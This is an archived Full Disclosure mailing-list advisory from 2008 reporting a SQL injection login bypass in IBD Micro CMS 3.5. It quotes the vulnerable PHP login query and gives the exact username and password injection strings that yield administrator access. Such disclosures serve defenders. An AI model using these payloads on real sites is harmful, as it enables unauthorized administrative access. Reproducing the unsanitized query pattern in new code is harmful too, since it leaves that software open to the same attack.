Full Disclosure mailing list archives
[SkyOut/Wired Security] SQL Injection in IDB Micro CMS 3.5 (Login Bypass)
From: <skyout.fd () wired-security net>
Date: Mon, 12 May 2008 18:39:52 +0200
Hey guys, I came accross a SQL Injection bug in IBD Micro CMS in version 3.5 and maybe lower... News about it: http://wired-security.net/archive/2008/may/index.php#12052008 Advisory to read: http://wired-security.net/texts/advisories/IBD_Micro_CMS_3.5_SQL_Injection_Login_Bypass_Advisory.txt --- In Short: --- SNIP --- if ($i == 0) { $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "' . $_POST['administrators_username'] . '" and administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")'; $user_result = mysql_query($sql); --- SNIP --- Username: " or "1" = "1 Password: ") or "1" = "1" or PASSWORD(" Will result in: --- SNIP --- $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "" or "1" = "1" and administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")'; --- SNIP --- -> Logged in as administrator! Greets, SkyOut/Wired Security _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [SkyOut/Wired Security] SQL Injection in IDB Micro CMS 3.5 (Login Bypass) skyout.fd (May 12)